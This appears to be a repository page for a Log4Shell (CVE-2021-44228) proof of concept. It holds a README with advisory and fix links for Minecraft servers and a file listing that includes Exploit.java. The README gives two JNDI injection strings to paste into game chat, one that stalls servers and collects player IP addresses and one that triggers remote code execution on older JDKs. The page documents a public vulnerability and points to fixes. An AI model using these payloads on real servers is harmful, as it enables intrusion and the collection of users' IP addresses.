CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

Associated Vulnerability

Description

Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information

Readme

# Log4J-RCE-Proof-Of-Concept (CVE-2021-44228)

This is a proof of concept of the log4j rce.

Here are some links for the CVE-2021-44228:
- https://www.lunasec.io/docs/blog/log4j-zero-day
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://github.com/apache/logging-log4j2/pull/608
- https://www.youtube.com/watch?v=JPGola6BamU

This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is **[2.15.0](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.15.0)** which fixes the exploit.

## Demonstration with minecraft (which uses log4j2)

- Details for the impact on minecraft are listed here: https://twitter.com/slicedlime/status/1469150993527017483
- Article from minecraft is here: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
- Fixed minecraft forge versions: https://twitter.com/gigaherz/status/1469331288368861195
- Detailed article from minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
- Fixed minecraft fabric versions: https://twitter.com/slicedlime/status/1469192689904193537
- Fixed minecraft paper versions: https://twitter.com/aurora_smiles_/status/1469205803232026625
- Fixed minecraft spigot versions: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
- Fixed minecraft sponge versions: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

### Lag or sending serialized data 

- Paste ``${jndi:ldap://127.0.0.1/e}`` in the chat. If there is an open socket on port ``389`` logj4 tries to connect and blocks further communiction until a timeout occurs.
- When using this proof of concept exploit, the log in the console will log ``THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!`` which is a serialized string object from the ldap server.

![image](https://user-images.githubusercontent.com/7681220/145529175-b6f88cf0-67d0-450b-a834-87942202d594.png)

- Additionally the malicious ldap server receives every ip address where the message is logged. This means that ip adresses of players on a server can be collected which this exploit.

### RCE

- Paste ``${jndi:ldap://127.0.0.1/exe}`` in the chat. If ``-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`` is set to true the remote code execution will happen.

![image](https://user-images.githubusercontent.com/7681220/145529797-a3952c3e-c81e-4e91-b383-490688736f9c.png)

- Fortunately modern jdks disable remote class loading by default. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
- Old versions may still allow this!!

## Disclaimer

This project is only for educational purposes.


 

File Snapshot

 [4.0K]  /data/pocs/65299d3cc058cb1d0312f5846b8aa5f391d93a03
├── [ 227]  build.gradle
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 58K]  gradle-wrapper.jar
│       └── [ 200]  gradle-wrapper.properties
├── [5.6K]  gradlew
├── [2.6K]  gradlew.bat
├── [6.9K]  LICENSE
├── [2.6K]  README.md
├── [  36]  settings.gradle
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            ├── [3.7K]  Exploit.java
            └── [4.0K]  rofl
                └── [ 299]  ROFL.java

6 directories, 10 files

Remarks